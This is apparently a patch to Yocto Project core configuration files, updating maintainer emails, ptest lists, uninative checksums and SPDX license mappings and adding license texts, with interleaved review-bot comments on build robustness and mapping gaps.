@@ -125,7 +125,7 @@ RECIPE_MAINTAINER_pn-core-image-sato-dev = "Richard Purdie <richard.purdie@linux
125RECIPE_MAINTAINER_pn-core-image-sato-ptest-fast = "Richard Purdie <richard.purdie@linuxfoundation.org>" 125RECIPE_MAINTAINER_pn-core-image-sato-ptest-fast = "Richard Purdie <richard.purdie@linuxfoundation.org>"
126RECIPE_MAINTAINER_pn-core-image-sato-sdk-ptest = "Richard Purdie <richard.purdie@linuxfoundation.org>" 126RECIPE_MAINTAINER_pn-core-image-sato-sdk-ptest = "Richard Purdie <richard.purdie@linuxfoundation.org>"
127RECIPE_MAINTAINER_pn-coreutils = "Chen Qi <Qi.Chen@windriver.com>" 127RECIPE_MAINTAINER_pn-coreutils = "Chen Qi <Qi.Chen@windriver.com>"
128RECIPE_MAINTAINER_pn-cpio = "Denys Dmytriyenko <denys@ti.com>" 128RECIPE_MAINTAINER_pn-cpio = "Denys Dmytriyenko <denys@denix.org>"
129RECIPE_MAINTAINER_pn-cracklib = "Armin Kuster <akuster808@gmail.com>" 129RECIPE_MAINTAINER_pn-cracklib = "Armin Kuster <akuster808@gmail.com>"
130RECIPE_MAINTAINER_pn-createrepo-c = "Alexander Kanavin <alex.kanavin@gmail.com>" 130RECIPE_MAINTAINER_pn-createrepo-c = "Alexander Kanavin <alex.kanavin@gmail.com>"
131RECIPE_MAINTAINER_pn-cronie = "Anuj Mittal <anuj.mittal@intel.com>" 131RECIPE_MAINTAINER_pn-cronie = "Anuj Mittal <anuj.mittal@intel.com>"
@@ -194,7 +194,7 @@ RECIPE_MAINTAINER_pn-gcc-cross-canadian-${TRANSLATED_TARGET_ARCH} = "Khem Raj <r
194RECIPE_MAINTAINER_pn-gcc-crosssdk-${SDK_SYS} = "Khem Raj <raj.khem@gmail.com>" 194RECIPE_MAINTAINER_pn-gcc-crosssdk-${SDK_SYS} = "Khem Raj <raj.khem@gmail.com>"
195RECIPE_MAINTAINER_pn-gcc-runtime = "Khem Raj <raj.khem@gmail.com>" 195RECIPE_MAINTAINER_pn-gcc-runtime = "Khem Raj <raj.khem@gmail.com>"
196RECIPE_MAINTAINER_pn-gcc-sanitizers = "Khem Raj <raj.khem@gmail.com>" 196RECIPE_MAINTAINER_pn-gcc-sanitizers = "Khem Raj <raj.khem@gmail.com>"
197RECIPE_MAINTAINER_pn-gcc-source-9.3.0 = "Khem Raj <raj.khem@gmail.com>" 197RECIPE_MAINTAINER_pn-gcc-source-9.5.0 = "Khem Raj <raj.khem@gmail.com>"
198RECIPE_MAINTAINER_pn-gconf = "Ross Burton <ross.burton@arm.com>" 198RECIPE_MAINTAINER_pn-gconf = "Ross Burton <ross.burton@arm.com>"
199RECIPE_MAINTAINER_pn-gcr = "Alexander Kanavin <alex.kanavin@gmail.com>" 199RECIPE_MAINTAINER_pn-gcr = "Alexander Kanavin <alex.kanavin@gmail.com>"
200RECIPE_MAINTAINER_pn-gdb = "Khem Raj <raj.khem@gmail.com>" 200RECIPE_MAINTAINER_pn-gdb = "Khem Raj <raj.khem@gmail.com>"
@@ -233,7 +233,7 @@ RECIPE_MAINTAINER_pn-gobject-introspection = "Alexander Kanavin <alex.kanavin@gm
233RECIPE_MAINTAINER_pn-gperf = "Alexander Kanavin <alex.kanavin@gmail.com>" 233RECIPE_MAINTAINER_pn-gperf = "Alexander Kanavin <alex.kanavin@gmail.com>"
234RECIPE_MAINTAINER_pn-gpgme = "Hongxu Jia <hongxu.jia@windriver.com>" 234RECIPE_MAINTAINER_pn-gpgme = "Hongxu Jia <hongxu.jia@windriver.com>"
235RECIPE_MAINTAINER_pn-gptfdisk = "Alexander Kanavin <alex.kanavin@gmail.com>" 235RECIPE_MAINTAINER_pn-gptfdisk = "Alexander Kanavin <alex.kanavin@gmail.com>"
236RECIPE_MAINTAINER_pn-grep = "Denys Dmytriyenko <denys@ti.com>" 236RECIPE_MAINTAINER_pn-grep = "Denys Dmytriyenko <denys@denix.org>"
237RECIPE_MAINTAINER_pn-groff = "Hongxu Jia <hongxu.jia@windriver.com>" 237RECIPE_MAINTAINER_pn-groff = "Hongxu Jia <hongxu.jia@windriver.com>"
238RECIPE_MAINTAINER_pn-grub = "Anuj Mittal <anuj.mittal@intel.com>" 238RECIPE_MAINTAINER_pn-grub = "Anuj Mittal <anuj.mittal@intel.com>"
239RECIPE_MAINTAINER_pn-grub-bootconf = "Anuj Mittal <anuj.mittal@intel.com>" 239RECIPE_MAINTAINER_pn-grub-bootconf = "Anuj Mittal <anuj.mittal@intel.com>"
@@ -254,9 +254,9 @@ RECIPE_MAINTAINER_pn-gstreamer1.0-rtsp-server = "Anuj Mittal <anuj.mittal@intel.
254RECIPE_MAINTAINER_pn-gstreamer1.0-vaapi = "Anuj Mittal <anuj.mittal@intel.com>" 254RECIPE_MAINTAINER_pn-gstreamer1.0-vaapi = "Anuj Mittal <anuj.mittal@intel.com>"
255RECIPE_MAINTAINER_pn-gtk+3 = "Ross Burton <ross.burton@arm.com>" 255RECIPE_MAINTAINER_pn-gtk+3 = "Ross Burton <ross.burton@arm.com>"
256RECIPE_MAINTAINER_pn-gtk-doc = "Alexander Kanavin <alex.kanavin@gmail.com>" 256RECIPE_MAINTAINER_pn-gtk-doc = "Alexander Kanavin <alex.kanavin@gmail.com>"
257RECIPE_MAINTAINER_pn-gzip = "Denys Dmytriyenko <denys@ti.com>" 257RECIPE_MAINTAINER_pn-gzip = "Denys Dmytriyenko <denys@denix.org>"
258RECIPE_MAINTAINER_pn-harfbuzz = "Anuj Mittal <anuj.mittal@intel.com>" 258RECIPE_MAINTAINER_pn-harfbuzz = "Anuj Mittal <anuj.mittal@intel.com>"
259RECIPE_MAINTAINER_pn-hdparm = "Denys Dmytriyenko <denys@ti.com>" 259RECIPE_MAINTAINER_pn-hdparm = "Denys Dmytriyenko <denys@denix.org>"
260RECIPE_MAINTAINER_pn-help2man-native = "Hongxu Jia <hongxu.jia@windriver.com>" 260RECIPE_MAINTAINER_pn-help2man-native = "Hongxu Jia <hongxu.jia@windriver.com>"
261RECIPE_MAINTAINER_pn-hicolor-icon-theme = "Anuj Mittal <anuj.mittal@intel.com>" 261RECIPE_MAINTAINER_pn-hicolor-icon-theme = "Anuj Mittal <anuj.mittal@intel.com>"
262RECIPE_MAINTAINER_pn-hwlatdetect = "Alexander Kanavin <alex.kanavin@gmail.com>" 262RECIPE_MAINTAINER_pn-hwlatdetect = "Alexander Kanavin <alex.kanavin@gmail.com>"
@@ -454,10 +454,10 @@ RECIPE_MAINTAINER_pn-ltp = "Yi Zhao <yi.zhao@windriver.com>"
454RECIPE_MAINTAINER_pn-lttng-modules = "Richard Purdie <richard.purdie@linuxfoundation.org>" 454RECIPE_MAINTAINER_pn-lttng-modules = "Richard Purdie <richard.purdie@linuxfoundation.org>"
455RECIPE_MAINTAINER_pn-lttng-tools = "Richard Purdie <richard.purdie@linuxfoundation.org>" 455RECIPE_MAINTAINER_pn-lttng-tools = "Richard Purdie <richard.purdie@linuxfoundation.org>"
456RECIPE_MAINTAINER_pn-lttng-ust = "Richard Purdie <richard.purdie@linuxfoundation.org>" 456RECIPE_MAINTAINER_pn-lttng-ust = "Richard Purdie <richard.purdie@linuxfoundation.org>"
457RECIPE_MAINTAINER_pn-lz4 = "Denys Dmytriyenko <denys@ti.com>" 457RECIPE_MAINTAINER_pn-lz4 = "Denys Dmytriyenko <denys@denix.org>"
458RECIPE_MAINTAINER_pn-lzo = "Denys Dmytriyenko <denys@ti.com>" 458RECIPE_MAINTAINER_pn-lzo = "Denys Dmytriyenko <denys@denix.org>"
459RECIPE_MAINTAINER_pn-lzip = "Denys Dmytriyenko <denys@ti.com>" 459RECIPE_MAINTAINER_pn-lzip = "Denys Dmytriyenko <denys@denix.org>"
460RECIPE_MAINTAINER_pn-lzop = "Denys Dmytriyenko <denys@ti.com>" 460RECIPE_MAINTAINER_pn-lzop = "Denys Dmytriyenko <denys@denix.org>"
461RECIPE_MAINTAINER_pn-m4 = "Robert Yang <liezhi.yang@windriver.com>" 461RECIPE_MAINTAINER_pn-m4 = "Robert Yang <liezhi.yang@windriver.com>"
462RECIPE_MAINTAINER_pn-m4-native = "Robert Yang <liezhi.yang@windriver.com>" 462RECIPE_MAINTAINER_pn-m4-native = "Robert Yang <liezhi.yang@windriver.com>"
463RECIPE_MAINTAINER_pn-make = "Robert Yang <liezhi.yang@windriver.com>" 463RECIPE_MAINTAINER_pn-make = "Robert Yang <liezhi.yang@windriver.com>"
@@ -501,7 +501,7 @@ RECIPE_MAINTAINER_pn-mpeg2dec = "Alexander Kanavin <alex.kanavin@gmail.com>"
501RECIPE_MAINTAINER_pn-mpfr = "Khem Raj <raj.khem@gmail.com>" 501RECIPE_MAINTAINER_pn-mpfr = "Khem Raj <raj.khem@gmail.com>"
502RECIPE_MAINTAINER_pn-mpg123 = "Alexander Kanavin <alex.kanavin@gmail.com>" 502RECIPE_MAINTAINER_pn-mpg123 = "Alexander Kanavin <alex.kanavin@gmail.com>"
503RECIPE_MAINTAINER_pn-msmtp = "Alexander Kanavin <alex.kanavin@gmail.com>" 503RECIPE_MAINTAINER_pn-msmtp = "Alexander Kanavin <alex.kanavin@gmail.com>"
504RECIPE_MAINTAINER_pn-mtd-utils = "Denys Dmytriyenko <denys@ti.com>" 504RECIPE_MAINTAINER_pn-mtd-utils = "Denys Dmytriyenko <denys@denix.org>"
505RECIPE_MAINTAINER_pn-mtdev = "Anuj Mittal <anuj.mittal@intel.com>" 505RECIPE_MAINTAINER_pn-mtdev = "Anuj Mittal <anuj.mittal@intel.com>"
506RECIPE_MAINTAINER_pn-mtools = "Anuj Mittal <anuj.mittal@intel.com>" 506RECIPE_MAINTAINER_pn-mtools = "Anuj Mittal <anuj.mittal@intel.com>"
507RECIPE_MAINTAINER_pn-musl = "Khem Raj <raj.khem@gmail.com>" 507RECIPE_MAINTAINER_pn-musl = "Khem Raj <raj.khem@gmail.com>"
@@ -545,7 +545,7 @@ RECIPE_MAINTAINER_pn-pango = "Ross Burton <ross.burton@arm.com>"
545RECIPE_MAINTAINER_pn-parted = "Hongxu Jia <hongxu.jia@windriver.com>" 545RECIPE_MAINTAINER_pn-parted = "Hongxu Jia <hongxu.jia@windriver.com>"
546RECIPE_MAINTAINER_pn-patch = "Hongxu Jia <hongxu.jia@windriver.com>" 546RECIPE_MAINTAINER_pn-patch = "Hongxu Jia <hongxu.jia@windriver.com>"
547RECIPE_MAINTAINER_pn-patchelf = "Richard Purdie <richard.purdie@linuxfoundation.org>" 547RECIPE_MAINTAINER_pn-patchelf = "Richard Purdie <richard.purdie@linuxfoundation.org>"
548RECIPE_MAINTAINER_pn-pbzip2 = "Denys Dmytriyenko <denys@ti.com>" 548RECIPE_MAINTAINER_pn-pbzip2 = "Denys Dmytriyenko <denys@denix.org>"
549RECIPE_MAINTAINER_pn-pciutils = "Chen Qi <Qi.Chen@windriver.com>" 549RECIPE_MAINTAINER_pn-pciutils = "Chen Qi <Qi.Chen@windriver.com>"
550RECIPE_MAINTAINER_pn-pcmanfm = "Alexander Kanavin <alex.kanavin@gmail.com>" 550RECIPE_MAINTAINER_pn-pcmanfm = "Alexander Kanavin <alex.kanavin@gmail.com>"
551RECIPE_MAINTAINER_pn-perf = "Bruce Ashfield <bruce.ashfield@gmail.com>" 551RECIPE_MAINTAINER_pn-perf = "Bruce Ashfield <bruce.ashfield@gmail.com>"
@@ -576,6 +576,7 @@ RECIPE_MAINTAINER_pn-python3 = "Oleksandr Kravchuk <open.source@oleksandr-kravch
576RECIPE_MAINTAINER_pn-python3-async = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>" 576RECIPE_MAINTAINER_pn-python3-async = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>"
577RECIPE_MAINTAINER_pn-python3-dbus = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>" 577RECIPE_MAINTAINER_pn-python3-dbus = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>"
578RECIPE_MAINTAINER_pn-python3-docutils = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>" 578RECIPE_MAINTAINER_pn-python3-docutils = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>"
579RECIPE_MAINTAINER_pn-python3-dtschema-wrapper = "Bruce Ashfield <bruce.ashfield@gmail.com>"
579RECIPE_MAINTAINER_pn-python3-pycryptodome = "Joshua Watt <JPEWhacker@gmail.com>" 580RECIPE_MAINTAINER_pn-python3-pycryptodome = "Joshua Watt <JPEWhacker@gmail.com>"
580RECIPE_MAINTAINER_pn-python3-pycryptodomex = "Joshua Watt <JPEWhacker@gmail.com>" 581RECIPE_MAINTAINER_pn-python3-pycryptodomex = "Joshua Watt <JPEWhacker@gmail.com>"
581RECIPE_MAINTAINER_pn-python3-extras = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>" 582RECIPE_MAINTAINER_pn-python3-extras = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>"
@@ -661,9 +662,9 @@ RECIPE_MAINTAINER_pn-systemd-conf = "Chen Qi <Qi.Chen@windriver.com>"
661RECIPE_MAINTAINER_pn-systemd-compat-units = "Chen Qi <Qi.Chen@windriver.com>" 662RECIPE_MAINTAINER_pn-systemd-compat-units = "Chen Qi <Qi.Chen@windriver.com>"
662RECIPE_MAINTAINER_pn-systemd-serialgetty = "Chen Qi <Qi.Chen@windriver.com>" 663RECIPE_MAINTAINER_pn-systemd-serialgetty = "Chen Qi <Qi.Chen@windriver.com>"
663RECIPE_MAINTAINER_pn-systemd-systemctl-native = "Chen Qi <Qi.Chen@windriver.com>" 664RECIPE_MAINTAINER_pn-systemd-systemctl-native = "Chen Qi <Qi.Chen@windriver.com>"
664RECIPE_MAINTAINER_pn-systemtap = "Victor Kamensky <kamensky@cisco.com>" 665RECIPE_MAINTAINER_pn-systemtap = "Victor Kamensky <victor.kamensky7@gmail.com>"
665RECIPE_MAINTAINER_pn-systemtap-native = "Victor Kamensky <kamensky@cisco.com>" 666RECIPE_MAINTAINER_pn-systemtap-native = "Victor Kamensky <victor.kamensky7@gmail.com>"
666RECIPE_MAINTAINER_pn-systemtap-uprobes = "Victor Kamensky <kamensky@cisco.com>" 667RECIPE_MAINTAINER_pn-systemtap-uprobes = "Victor Kamensky <victor.kamensky7@gmail.com>"
667RECIPE_MAINTAINER_pn-sysvinit = "Ross Burton <ross.burton@arm.com>" 668RECIPE_MAINTAINER_pn-sysvinit = "Ross Burton <ross.burton@arm.com>"
668RECIPE_MAINTAINER_pn-sysvinit-inittab = "Ross Burton <ross.burton@arm.com>" 669RECIPE_MAINTAINER_pn-sysvinit-inittab = "Ross Burton <ross.burton@arm.com>"
669RECIPE_MAINTAINER_pn-taglib = "Anuj Mittal <anuj.mittal@intel.com>" 670RECIPE_MAINTAINER_pn-taglib = "Anuj Mittal <anuj.mittal@intel.com>"
@@ -685,7 +686,7 @@ RECIPE_MAINTAINER_pn-udev-extraconf = "Ross Burton <ross.burton@arm.com>"
685RECIPE_MAINTAINER_pn-unfs3 = "Ross Burton <ross.burton@arm.com>" 686RECIPE_MAINTAINER_pn-unfs3 = "Ross Burton <ross.burton@arm.com>"
686RECIPE_MAINTAINER_pn-unifdef = "Ross Burton <ross.burton@arm.com>" 687RECIPE_MAINTAINER_pn-unifdef = "Ross Burton <ross.burton@arm.com>"
687RECIPE_MAINTAINER_pn-uninative-tarball = "Richard Purdie <richard.purdie@linuxfoundation.org>" 688RECIPE_MAINTAINER_pn-uninative-tarball = "Richard Purdie <richard.purdie@linuxfoundation.org>"
688RECIPE_MAINTAINER_pn-unzip = "Denys Dmytriyenko <denys@ti.com>" 689RECIPE_MAINTAINER_pn-unzip = "Denys Dmytriyenko <denys@denix.org>"
689RECIPE_MAINTAINER_pn-update-rc.d = "Ross Burton <ross.burton@arm.com>" 690RECIPE_MAINTAINER_pn-update-rc.d = "Ross Burton <ross.burton@arm.com>"
690RECIPE_MAINTAINER_pn-usbinit = "Alexander Kanavin <alex.kanavin@gmail.com>" 691RECIPE_MAINTAINER_pn-usbinit = "Alexander Kanavin <alex.kanavin@gmail.com>"
691RECIPE_MAINTAINER_pn-usbutils = "Alexander Kanavin <alex.kanavin@gmail.com>" 692RECIPE_MAINTAINER_pn-usbutils = "Alexander Kanavin <alex.kanavin@gmail.com>"
@@ -706,11 +707,11 @@ RECIPE_MAINTAINER_pn-vulkan-tools = "Anuj Mittal <anuj.mittal@intel.com>"
706RECIPE_MAINTAINER_pn-waffle = "Ross Burton <ross.burton@arm.com>" 707RECIPE_MAINTAINER_pn-waffle = "Ross Burton <ross.burton@arm.com>"
707RECIPE_MAINTAINER_pn-watchdog = "Alexander Kanavin <alex.kanavin@gmail.com>" 708RECIPE_MAINTAINER_pn-watchdog = "Alexander Kanavin <alex.kanavin@gmail.com>"
708RECIPE_MAINTAINER_pn-watchdog-config = "Alexander Kanavin <alex.kanavin@gmail.com>" 709RECIPE_MAINTAINER_pn-watchdog-config = "Alexander Kanavin <alex.kanavin@gmail.com>"
709RECIPE_MAINTAINER_pn-wayland = "Denys Dmytriyenko <denys@ti.com>" 710RECIPE_MAINTAINER_pn-wayland = "Denys Dmytriyenko <denys@denix.org>"
710RECIPE_MAINTAINER_pn-wayland-protocols = "Denys Dmytriyenko <denys@ti.com>" 711RECIPE_MAINTAINER_pn-wayland-protocols = "Denys Dmytriyenko <denys@denix.org>"
711RECIPE_MAINTAINER_pn-webkitgtk = "Alexander Kanavin <alex.kanavin@gmail.com>" 712RECIPE_MAINTAINER_pn-webkitgtk = "Alexander Kanavin <alex.kanavin@gmail.com>"
712RECIPE_MAINTAINER_pn-weston = "Denys Dmytriyenko <denys@ti.com>" 713RECIPE_MAINTAINER_pn-weston = "Denys Dmytriyenko <denys@denix.org>"
713RECIPE_MAINTAINER_pn-weston-init = "Denys Dmytriyenko <denys@ti.com>" 714RECIPE_MAINTAINER_pn-weston-init = "Denys Dmytriyenko <denys@denix.org>"
714RECIPE_MAINTAINER_pn-wget = "Yi Zhao <yi.zhao@windriver.com>" 715RECIPE_MAINTAINER_pn-wget = "Yi Zhao <yi.zhao@windriver.com>"
715RECIPE_MAINTAINER_pn-which = "Anuj Mittal <anuj.mittal@intel.com>" 716RECIPE_MAINTAINER_pn-which = "Anuj Mittal <anuj.mittal@intel.com>"
716RECIPE_MAINTAINER_pn-wic-tools = "Anuj Mittal <anuj.mittal@intel.com>" 717RECIPE_MAINTAINER_pn-wic-tools = "Anuj Mittal <anuj.mittal@intel.com>"
@@ -764,6 +765,6 @@ RECIPE_MAINTAINER_pn-xtrans = "Armin Kuster <akuster808@gmail.com>"
764RECIPE_MAINTAINER_pn-xuser-account = "Armin Kuster <akuster808@gmail.com>" 765RECIPE_MAINTAINER_pn-xuser-account = "Armin Kuster <akuster808@gmail.com>"
765RECIPE_MAINTAINER_pn-xvinfo = "Armin Kuster <akuster808@gmail.com>" 766RECIPE_MAINTAINER_pn-xvinfo = "Armin Kuster <akuster808@gmail.com>"
766RECIPE_MAINTAINER_pn-xwininfo = "Armin Kuster <akuster808@gmail.com>" 767RECIPE_MAINTAINER_pn-xwininfo = "Armin Kuster <akuster808@gmail.com>"
767RECIPE_MAINTAINER_pn-xz = "Denys Dmytriyenko <denys@ti.com>" 768RECIPE_MAINTAINER_pn-xz = "Denys Dmytriyenko <denys@denix.org>"
768RECIPE_MAINTAINER_pn-zip = "Denys Dmytriyenko <denys@ti.com>" 769RECIPE_MAINTAINER_pn-zip = "Denys Dmytriyenko <denys@denix.org>"
769RECIPE_MAINTAINER_pn-zlib = "Denys Dmytriyenko <denys@ti.com>" 770RECIPE_MAINTAINER_pn-zlib = "Denys Dmytriyenko <denys@denix.org>"
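--- a/meta/conf/distro/include/ptest-packagelists.inc
+++ b/meta/conf/distro/include/ptest-packagelists.inc
@@ -26,6 +26,7 @@ PTESTS_FAST = "\
  liberror-perl-ptest \
  libmodule-build-perl-ptest \
  libpcre-ptest \
+ libpng-ptest \
  libtimedate-perl-ptest \
  libtest-needs-perl-ptest \
  liburi-perl-ptest \
@@ -60,6 +61,7 @@ PTESTS_FAST = "\
 # bash-ptest \ # Test outcomes are non-deterministic by design
 # ifupdown-ptest \ # Tested separately in lib/oeqa/selftest/cases/imagefeatures.py
 # mdadm-ptest \ # Tests rely on non-deterministic sleep() amounts
+# libinput-ptest \ # Tests need an unloaded system to be reliable
 #"
 
 PTESTS_SLOW = "\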
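--- a/meta/conf/distro/include/yocto-uninative.inc
+++ b/meta/conf/distro/include/yocto-uninative.inc
@@ -6,9 +6,10 @@
 # to the distro running on the build machine.
 #
 
-UNINATIVE_MAXGLIBCVERSION = "2.32"
+UNINATIVE_MAXGLIBCVERSION = "2.39"
+UNINATIVE_VERSION = "4.4"
 
-UNINATIVE_URL ?= "http://downloads.yoctoproject.org/releases/uninative/2.10/"
-UNINATIVE_CHECKSUM[aarch64] ?= "645e5c50b2b48aabb8b10f783a9f94b4b7c5ddc7cfceb5386d43b86d30253202"
-UNINATIVE_CHECKSUM[i686] ?= "233e09b5ff30e15341232a0c16fa8448ff31dccb8f3f3e2ad3948cdac8c4a598"
-UNINATIVE_CHECKSUM[x86_64] ?= "04333677f81990ce2cf55c3bc256cd84a66085d18fc95ccddfab8581e4aec014"
+UNINATIVE_URL ?= "http://downloads.yoctoproject.org/releases/uninative/${UNINATIVE_VERSION}/"
+UNINATIVE_CHECKSUM[aarch64] ?= "b61876130f494f75092f21086b4a64ea5fb064045769bf1d32e9cb6af17ea8ec"
+UNINATIVE_CHECKSUM[i686] ?= "9f28627828f0082cc0344eede4d9a861a9a064bfa8f36e072e46212f0fe45fcc"
+UNINATIVE_CHECKSUM[x86_64] ?= "d81c54284be2bb886931fc87281d58177a2cd381cf99d1981f8923039a72a302"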
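Review bot: The new `UNINATIVE_URL` default still fetches the prebuilt uninative tarball over plain `http://`, so in transit the only protection for this host-side binary is the pinned `UNINATIVE_CHECKSUM[...]` values. If the download host serves TLS, prefer `UNINATIVE_URL ?= "https://downloads.yoctoproject.org/releases/uninative/${UNINATIVE_VERSION}/"`. Since the URL now follows `UNINATIVE_VERSION` while the three checksums are separate weak `?=` defaults, a comment above them would help, for example `# Keep UNINATIVE_VERSION and the UNINATIVE_CHECKSUM values in step: the checksums pin the tarballs for this version`. The code that compares the checksum is not part of this hunk, so how a mismatch is handled should be confirmed there.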
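--- a/meta/conf/layer.conf
+++ b/meta/conf/layer.conf
@@ -102,4 +102,4 @@ SSTATE_EXCLUDEDEPS_SYSROOT += ".*->autoconf-archive-native"
 # We need to keep bitbake tools in PATH
 # Avoid empty path entries
 BITBAKEPATH := "${@os.path.dirname(bb.utils.which(d.getVar('PATH'),'bitbake'))}"
-PATH := "${@'${BITBAKEPATH}:' if '${BITBAKEPATH}' is not '' else ''}${HOSTTOOLS_DIR}"
+PATH := "${@'${BITBAKEPATH}:' if '${BITBAKEPATH}' != '' else ''}${HOSTTOOLS_DIR}"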
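Review bot: On line 105 `${BITBAKEPATH}` is still pasted as text into a single-quoted Python literal before the inline expression is evaluated, so a bitbake directory whose path contains a single quote would break or change the expression. Reading the value through the datastore avoids building Python source from a path: `PATH := "${@d.getVar('BITBAKEPATH') + ':' if d.getVar('BITBAKEPATH') else ''}${HOSTTOOLS_DIR}"`. The value comes from the builder's own `PATH` on line 104, so this is a robustness point rather than exposure to outside input.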
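--- a/meta/conf/licenses.conf
+++ b/meta/conf/licenses.conf
@@ -13,24 +13,39 @@
 SPDXLICENSEMAP[AGPL-3] = "AGPL-3.0"
 SPDXLICENSEMAP[AGPLv3] = "AGPL-3.0"
 SPDXLICENSEMAP[AGPLv3.0] = "AGPL-3.0"
+SPDXLICENSEMAP[AGPL-3.0-only] = "AGPL-3.0"
 
 # GPL variations
 SPDXLICENSEMAP[GPL-1] = "GPL-1.0"
 SPDXLICENSEMAP[GPLv1] = "GPL-1.0"
 SPDXLICENSEMAP[GPLv1.0] = "GPL-1.0"
+SPDXLICENSEMAP[GPL-1.0-only] = "GPL-1.0"
 SPDXLICENSEMAP[GPL-2] = "GPL-2.0"
 SPDXLICENSEMAP[GPLv2] = "GPL-2.0"
+SPDXLICENSEMAP[GPLv2+] = "GPL-2.0+"
 SPDXLICENSEMAP[GPLv2.0] = "GPL-2.0"
+SPDXLICENSEMAP[GPLv2.0+] = "GPL-2.0+"
+SPDXLICENSEMAP[GPL-2.0-only] = "GPL-2.0"
 SPDXLICENSEMAP[GPL-3] = "GPL-3.0"
 SPDXLICENSEMAP[GPLv3] = "GPL-3.0"
+SPDXLICENSEMAP[GPLv3+] = "GPL-3.0+"
 SPDXLICENSEMAP[GPLv3.0] = "GPL-3.0"
+SPDXLICENSEMAP[GPLv3.0+] = "GPL-3.0+"
+SPDXLICENSEMAP[GPL-3.0-only] = "GPL-3.0"
 
 #LGPL variations
 SPDXLICENSEMAP[LGPLv2] = "LGPL-2.0"
+SPDXLICENSEMAP[LGPLv2+] = "LGPL-2.0+"
 SPDXLICENSEMAP[LGPLv2.0] = "LGPL-2.0"
+SPDXLICENSEMAP[LGPLv2.0+] = "LGPL-2.0+"
+SPDXLICENSEMAP[LGPL-2.0-only] = "LGPL-2.0"
 SPDXLICENSEMAP[LGPL2.1] = "LGPL-2.1"
 SPDXLICENSEMAP[LGPLv2.1] = "LGPL-2.1"
+SPDXLICENSEMAP[LGPLv2.1+] = "LGPL-2.1+"
+SPDXLICENSEMAP[LGPL-2.1-only] = "LGPL-2.1"
 SPDXLICENSEMAP[LGPLv3] = "LGPL-3.0"
+SPDXLICENSEMAP[LGPLv3+] = "LGPL-3.0+"
+SPDXLICENSEMAP[LGPL-3.0-only] = "LGPL-3.0"
 
 #MPL variations
 SPDXLICENSEMAP[MPL-1] = "MPL-1.0"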
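Review bot: The added keys cover the SPDX `-only` spellings but none of the `-or-later` ones, so within this table `GPL-2.0-only` and `GPLv2+` are mapped while `GPL-2.0-or-later` is not. Unless those identifiers are resolved elsewhere (not visible in this hunk), add the counterparts next to each `-only` line, for example `SPDXLICENSEMAP[GPL-2.0-or-later] = "GPL-2.0+"` and `SPDXLICENSEMAP[LGPL-2.1-or-later] = "LGPL-2.1+"`. The AGPL group also gains no `+` entry such as `AGPLv3+`, unlike the GPL and LGPL groups. Gaps in this map are worth closing because license-compliance output depends on every spelling resolving to one canonical name.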
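--- a/meta/conf/multilib.conf
+++ b/meta/conf/multilib.conf
@@ -11,6 +11,8 @@ STAGING_DIR_TARGET = "${WORKDIR}/${MLPREFIX}recipe-sysroot"
 RECIPE_SYSROOT = "${WORKDIR}/${MLPREFIX}recipe-sysroot"
 RECIPE_SYSROOT_class-native = "${WORKDIR}/recipe-sysroot"
 
+PSEUDO_IGNORE_PATHS .= ",${WORKDIR}/${MLPREFIX}recipe-sysroot"
+
 INHERIT += "multilib_global"
 
 BBCLASSEXTEND_append = " ${MULTILIBS}"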
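--- /dev/null
+++ b/meta/files/common-licenses/Spencer-94
@@ -0,0 +1,12 @@
+Copyright 1992, 1993, 1994 Henry Spencer. All rights reserved.
+This software is not subject to any license of the American Telephone and Telegraph Company or of the Regents of the University of California.
+
+Permission is granted to anyone to use this software for any purpose on any computer system, and to alter it and redistribute it, subject to the following restrictions:
+
+1. The author is not responsible for the consequences of use of this software, no matter how awful, even if they arise from flaws in it.
+
+2. The origin of this software must not be misrepresented, either by explicit claim or by omission. Since few users ever read sources, credits must appear in the documentation.
+
+3. Altered versions must be plainly marked as such, and must not be misrepresented as being the original software. Since few users ever read sources, credits must appear in the documentation.
+
+4. This notice may not be removed or altered.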
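--- /dev/null
+++ b/meta/files/common-licenses/Unlicense
@@ -0,0 +1,24 @@
+This is free and unencumbered software released into the public domain.
+
+Anyone is free to copy, modify, publish, use, compile, sell, or
+distribute this software, either in source code form or as a compiled
+binary, for any purpose, commercial or non-commercial, and by any
+means.
+
+In jurisdictions that recognize copyright laws, the author or authors
+of this software dedicate any and all copyright interest in the
+software to the public domain. We make this dedication for the benefit
+of the public at large and to the detriment of our heirs and
+successors. We intend this dedication to be an overt act of
+relinquishment in perpetuity of all present and future rights to this
+software under copyright law.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
+IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
+OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
+ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
+OTHER DEALINGS IN THE SOFTWARE.
+
+For more information, please refer to <http://unlicense.org/>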
diff --git a/meta/files/spdx-licenses.json b/meta/files/spdx-licenses.json
new file mode 100644
index 0000000000..ef926164ec
--- /dev/null
+++ b/meta/files/spdx-licenses.json
@@ -0,0 +1,5937 @@
1{
2 "licenseListVersion": "3.14",
3 "licenses": [
4 {
5 "reference": "https://spdx.org/licenses/GPL-1.0.html",
6 "isDeprecatedLicenseId": true,
7 "detailsUrl": "https://spdx.org/licenses/GPL-1.0.json",
8 "referenceNumber": 0,
9 "name": "GNU General Public License v1.0 only",
10 "licenseId": "GPL-1.0",
11 "seeAlso": [
12 "https://www.gnu.org/licenses/old-licenses/gpl-1.0-standalone.html"
13 ],
14 "isOsiApproved": false
15 },
16 {
17 "reference": "https://spdx.org/licenses/bzip2-1.0.6.html",
18 "isDeprecatedLicenseId": false,
19 "detailsUrl": "https://spdx.org/licenses/bzip2-1.0.6.json",
20 "referenceNumber": 1,
21 "name": "bzip2 and libbzip2 License v1.0.6",
22 "licenseId": "bzip2-1.0.6",
23 "seeAlso": [
